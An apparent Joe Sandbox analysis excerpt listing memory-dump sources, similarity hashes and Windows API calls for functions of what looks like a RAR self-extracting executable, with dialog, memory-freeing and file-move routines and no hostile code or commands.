                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction ID: 0aec7c6907d9d163ab016ed2217c61ec712759f330c58d7a7e5b08800ecfe78b
                  • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                  • Instruction Fuzzy Hash: B731E5B16047458FCB14EF28C85126EBBE0FBA5700F54892DE599C7342C779EA49CF92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a1077e97ba8cd5a6d76d06c29d15ae4547f25d38bd4dcfa63fb218e5c73f6db7
                  • Instruction ID: f9876abd01b98de7e9eb56b621632f37c2a03ce0eb78804d3eb56b4e5e27d2d9
                  • Opcode Fuzzy Hash: a1077e97ba8cd5a6d76d06c29d15ae4547f25d38bd4dcfa63fb218e5c73f6db7
                  • Instruction Fuzzy Hash: F221DA32A205654BCB48CF2DDCE047A7762E78A311746C22FEA46CB6D1C635E965C7A0
                  APIs
                  • _swprintf.LIBCMT ref: 0017DABE
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                    • Part of subcall function 00181596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,001B0EE8,00000200,0017D202,00000000,?,00000050,001B0EE8), ref: 001815B3
                  • _strlen.LIBCMT ref: 0017DADF
                  • SetDlgItemTextW.USER32(?,001AE154,?), ref: 0017DB3F
                  • GetWindowRect.USER32(?,?), ref: 0017DB79
                  • GetClientRect.USER32(?,?), ref: 0017DB85
                  • GetWindowLongW.USER32(?,000000F0), ref: 0017DC25
                  • GetWindowRect.USER32(?,?), ref: 0017DC52
                  • SetWindowTextW.USER32(?,?), ref: 0017DC95
                  • GetSystemMetrics.USER32(00000008), ref: 0017DC9D
                  • GetWindow.USER32(?,00000005), ref: 0017DCA8
                  • GetWindowRect.USER32(00000000,?), ref: 0017DCD5
                  • GetWindow.USER32(00000000,00000002), ref: 0017DD47
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                  • String ID: $%s:$CAPTION$d
                  • API String ID: 2407758923-2512411981
                  • Opcode ID: 1e4ffde57d4d915ad3a5727601cd352427f50317d4a8d69a62b59409fac89de4
                  • Instruction ID: f861f6dd951012310ac333ec88e580107e845ecca218d053839c3a25545c8537
                  • Opcode Fuzzy Hash: 1e4ffde57d4d915ad3a5727601cd352427f50317d4a8d69a62b59409fac89de4
                  • Instruction Fuzzy Hash: 7281BF72109305AFD711DFA8DC88A6BBBF9EF89704F04891DFA9993290D770E905CB52
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 0019C277
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE2F
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE41
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE53
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE65
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE77
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE89
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BE9B
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BEAD
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BEBF
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BED1
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BEE3
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BEF5
                    • Part of subcall function 0019BE12: _free.LIBCMT ref: 0019BF07
                  • _free.LIBCMT ref: 0019C26C
                    • Part of subcall function 001984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?), ref: 001984F4
                    • Part of subcall function 001984DE: GetLastError.KERNEL32(?,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?,?), ref: 00198506
                  • _free.LIBCMT ref: 0019C28E
                  • _free.LIBCMT ref: 0019C2A3
                  • _free.LIBCMT ref: 0019C2AE
                  • _free.LIBCMT ref: 0019C2D0
                  • _free.LIBCMT ref: 0019C2E3
                  • _free.LIBCMT ref: 0019C2F1
                  • _free.LIBCMT ref: 0019C2FC
                  • _free.LIBCMT ref: 0019C334
                  • _free.LIBCMT ref: 0019C33B
                  • _free.LIBCMT ref: 0019C358
                  • _free.LIBCMT ref: 0019C370
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: e24a12f161af4dd11d1aa8303e6251802eabbb7363dc0fd0165f38e84bfa8ba2
                  • Instruction ID: 8c95993da05475dfe3e32fd391a04f63c8e363dd2fb2d0a5cc7d7dabc0994ba0
                  • Opcode Fuzzy Hash: e24a12f161af4dd11d1aa8303e6251802eabbb7363dc0fd0165f38e84bfa8ba2
                  • Instruction Fuzzy Hash: 203168326042059FEF20AF79D945B5AB3E9FF12350F15842AE489DB991DF31FD809BA0
                  APIs
                  • GetWindow.USER32(?,00000005), ref: 0018CD51
                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0018CD7D
                    • Part of subcall function 001817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0017BB05,00000000,.exe,?,?,00000800,?,?,001885DF,?), ref: 001817C2
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0018CD99
                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0018CDB0
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0018CDC4
                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0018CDED
                  • DeleteObject.GDI32(00000000), ref: 0018CDF4
                  • GetWindow.USER32(00000000,00000002), ref: 0018CDFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                  • String ID: STATIC
                  • API String ID: 3820355801-1882779555
                  • Opcode ID: efa430cc7b625ab83c9b73171cbb28b4e382673df1304c388a49cd9d2d5ddc69
                  • Instruction ID: 8117449a98b0d5dd901af5befc165e593ff757e75acd2307fe2bcf22078cdf5f
                  • Opcode Fuzzy Hash: efa430cc7b625ab83c9b73171cbb28b4e382673df1304c388a49cd9d2d5ddc69
                  • Instruction Fuzzy Hash: 8711E7325427117BE3217BA09C09FAF7B5CAB65751F008522FA52A1092DB748B469BF4
                  APIs
                  • _free.LIBCMT ref: 00198EC5
                    • Part of subcall function 001984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?), ref: 001984F4
                    • Part of subcall function 001984DE: GetLastError.KERNEL32(?,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?,?), ref: 00198506
                  • _free.LIBCMT ref: 00198ED1
                  • _free.LIBCMT ref: 00198EDC
                  • _free.LIBCMT ref: 00198EE7
                  • _free.LIBCMT ref: 00198EF2
                  • _free.LIBCMT ref: 00198EFD
                  • _free.LIBCMT ref: 00198F08
                  • _free.LIBCMT ref: 00198F13
                  • _free.LIBCMT ref: 00198F1E
                  • _free.LIBCMT ref: 00198F2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: c512aaeddbc193f7425d58d10fe589cf14e3586f3d44baa47e97865cb10ecc5e
                  • Instruction ID: 8ecb455aa3b7492189785b4c254b9bca3f2c9b4fd95c6f317f9c84523eb47c1b
                  • Opcode Fuzzy Hash: c512aaeddbc193f7425d58d10fe589cf14e3586f3d44baa47e97865cb10ecc5e
                  • Instruction Fuzzy Hash: F511A27650010DAFCF11EF94C942DDA3BA5FF16350B5280A5BA088B626DB31EA519B80
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: ;%u$x%u$xc%u
                  • API String ID: 0-2277559157
                  • Opcode ID: 33a1708906097c190877ccf1636a8e606cfebc23ec03b37e4779f9edac279aad
                  • Instruction ID: be753dfa7af1a949d78a521954ac167e722f2e4ccd7df2ca8ce3d052b650c98f
                  • Opcode Fuzzy Hash: 33a1708906097c190877ccf1636a8e606cfebc23ec03b37e4779f9edac279aad
                  • Instruction Fuzzy Hash: 4EF119716042405BDB19EF3485D5BFA77BA6FA4300F08C56DF88D8B283DB749946CBA2
                  APIs
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  • EndDialog.USER32(?,00000001), ref: 0018AD20
                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0018AD47
                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0018AD60
                  • SetWindowTextW.USER32(?,?), ref: 0018AD71
                  • GetDlgItem.USER32(?,00000065), ref: 0018AD7A
                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0018AD8E
                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0018ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: MessageSend$Item$TextWindow$Dialog
                  • String ID: LICENSEDLG
                  • API String ID: 3214253823-2177901306
                  • Opcode ID: 5bdd91c59a2a6db549eda9fa5164933bb530c3e74042cfda33a5f43cdeaa77da
                  • Instruction ID: 5e628c78b32af59ef637c36fcd4cf27826dc44c11ec9b75f860470678c5357cb
                  • Opcode Fuzzy Hash: 5bdd91c59a2a6db549eda9fa5164933bb530c3e74042cfda33a5f43cdeaa77da
                  • Instruction Fuzzy Hash: 3E21D8322411057BE2216F65DD49F3B3F6DEB5A746F414106F604D2CA0DB62AA40DB32
                  APIs
                  • __EH_prolog.LIBCMT ref: 00179448
                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0017946B
                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0017948A
                    • Part of subcall function 001817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0017BB05,00000000,.exe,?,?,00000800,?,?,001885DF,?), ref: 001817C2
                  • _swprintf.LIBCMT ref: 00179526
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                  • MoveFileW.KERNEL32(?,?), ref: 00179595
                  • MoveFileW.KERNEL32(?,?), ref: 001795D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                  • String ID: rtmp%d
                  • API String ID: 2111052971-3303766350
                  • Opcode ID: d9bd64126014b0c7d45b769ab1e0174d7515c7ef3726027fb1b217bb6aa886d9
                  • Instruction ID: 7d0efd8d7516d179105be7daeaf0e77732e80aa9e244eb92d851056b2816cbba
                  • Opcode Fuzzy Hash: d9bd64126014b0c7d45b769ab1e0174d7515c7ef3726027fb1b217bb6aa886d9
                  • Instruction Fuzzy Hash: C4414C72900258A6CF20EBA48C85EEF737CAF65380F0485A5B54DE3052EB748B8DCB64
                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00188F38
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00188F59
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00188F80
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Global$AllocByteCharCreateMultiStreamWide
                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                  • API String ID: 4094277203-4209811716
                  • Opcode ID: fbe0d82925cf08445fa1087f1d237e8c7fa9137d87a3e295dc9b065884fcbb35
                  • Instruction ID: c37f57212af0f60180bc3cc478078eacdd4a3cdb667d53ce8ff92b88554633ea
                  • Opcode Fuzzy Hash: fbe0d82925cf08445fa1087f1d237e8c7fa9137d87a3e295dc9b065884fcbb35
                  • Instruction Fuzzy Hash: DC317B325083017BEB24BB349C02FAFBB68DFA6720F40011EF911961C1EF649B09C7A5
                  APIs
                  • __aulldiv.LIBCMT ref: 00180A9D
                    • Part of subcall function 0017ACF5: GetVersionExW.KERNEL32(?), ref: 0017AD1A
                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00180AC0
                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00180AD2
                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00180AE3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00180AF3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00180B03
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00180B3D
                  • __aullrem.LIBCMT ref: 00180BCB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                  • String ID:
                  • API String ID: 1247370737-0
                  • Opcode ID: 73a2fd2f8a54d655e759409f363a984358ffa0e773ca779a1964d7a9e9eef816
                  • Instruction ID: a9264b71382f973254487f1314328f412b0da411dbbb32701214b2046712eac5
                  • Opcode Fuzzy Hash: 73a2fd2f8a54d655e759409f363a984358ffa0e773ca779a1964d7a9e9eef816
                  • Instruction Fuzzy Hash: 514139B5408306AFC354DF64C88096BFBF8FF88715F004A2EF59692650E779E688CB52
                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0019F5A2,?,00000000,?,00000000,00000000), ref: 0019EE6F
                  • __fassign.LIBCMT ref: 0019EEEA
                  • __fassign.LIBCMT ref: 0019EF05
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0019EF2B
                  • WriteFile.KERNEL32(?,?,00000000,0019F5A2,00000000,?,?,?,?,?,?,?,?,?,0019F5A2,?), ref: 0019EF4A
                  • WriteFile.KERNEL32(?,?,00000001,0019F5A2,00000000,?,?,?,?,?,?,?,?,?,0019F5A2,?), ref: 0019EF83
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: 3473b2c1110c8d0dad15a94ea6e0120e208879725c94f35d54929182dd84300d
                  • Instruction ID: c8de706726131ca9a213b41da6f53c64b7a750d292b57194147792d9ed9aedc9
                  • Opcode Fuzzy Hash: 3473b2c1110c8d0dad15a94ea6e0120e208879725c94f35d54929182dd84300d
                  • Instruction Fuzzy Hash: 97519E71E00209AFDF14CFA8D885BEEBBF9EF09310F24451AE555E7691E731AA50CB60
                  APIs
                  • GetTempPathW.KERNEL32(00000800,?), ref: 0018C54A
                  • _swprintf.LIBCMT ref: 0018C57E
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                  • SetDlgItemTextW.USER32(?,00000066,001B946A), ref: 0018C59E
                  • _wcschr.LIBVCRUNTIME ref: 0018C5D1
                  • EndDialog.USER32(?,00000001), ref: 0018C6B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                  • String ID: %s%s%u
                  • API String ID: 2892007947-1360425832
                  • Opcode ID: 0815b6ee9548dda019f0735218e2f7f9637904ac031436d44f07db935d178be6
                  • Instruction ID: 66194b29d31c703a1d1f311fef3e0b4ea8c7018dc2bf972b60826dad530e1469
                  • Opcode Fuzzy Hash: 0815b6ee9548dda019f0735218e2f7f9637904ac031436d44f07db935d178be6
                  • Instruction Fuzzy Hash: 42416F71D00618EADB26EBA0DC45EEA77BDAF18705F1080A6F509E7161E7719BC4CFA0
                  APIs
                  • ShowWindow.USER32(?,00000000), ref: 0018964E
                  • GetWindowRect.USER32(?,00000000), ref: 00189693
                  • ShowWindow.USER32(?,00000005,00000000), ref: 0018972A
                  • SetWindowTextW.USER32(?,00000000), ref: 00189732
                  • ShowWindow.USER32(00000000,00000005), ref: 00189748
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Window$Show$RectText
                  • String ID: RarHtmlClassName
                  • API String ID: 3937224194-1658105358
                  • Opcode ID: de15f341872cfdeed324728dc92205476df26cde5e2478b2ce0ef63f2e2e1e58
                  • Instruction ID: 951859ec0dccdf631fabd68bede8468bb04f76fb9882230e3a75844d07d3a0d3
                  • Opcode Fuzzy Hash: de15f341872cfdeed324728dc92205476df26cde5e2478b2ce0ef63f2e2e1e58
                  • Instruction Fuzzy Hash: 37310131006210EFCB21AF60DC48B2B7BA8FF58301F09855AFE599A152DB34DA44CF61
                  APIs
                    • Part of subcall function 0019BF79: _free.LIBCMT ref: 0019BFA2
                  • _free.LIBCMT ref: 0019C003
                    • Part of subcall function 001984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?), ref: 001984F4
                    • Part of subcall function 001984DE: GetLastError.KERNEL32(?,?,0019BFA7,?,00000000,?,00000000,?,0019BFCE,?,00000007,?,?,0019C3CB,?,?), ref: 00198506
                  • _free.LIBCMT ref: 0019C00E
                  • _free.LIBCMT ref: 0019C019
                  • _free.LIBCMT ref: 0019C06D
                  • _free.LIBCMT ref: 0019C078
                  • _free.LIBCMT ref: 0019C083
                  • _free.LIBCMT ref: 0019C08E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
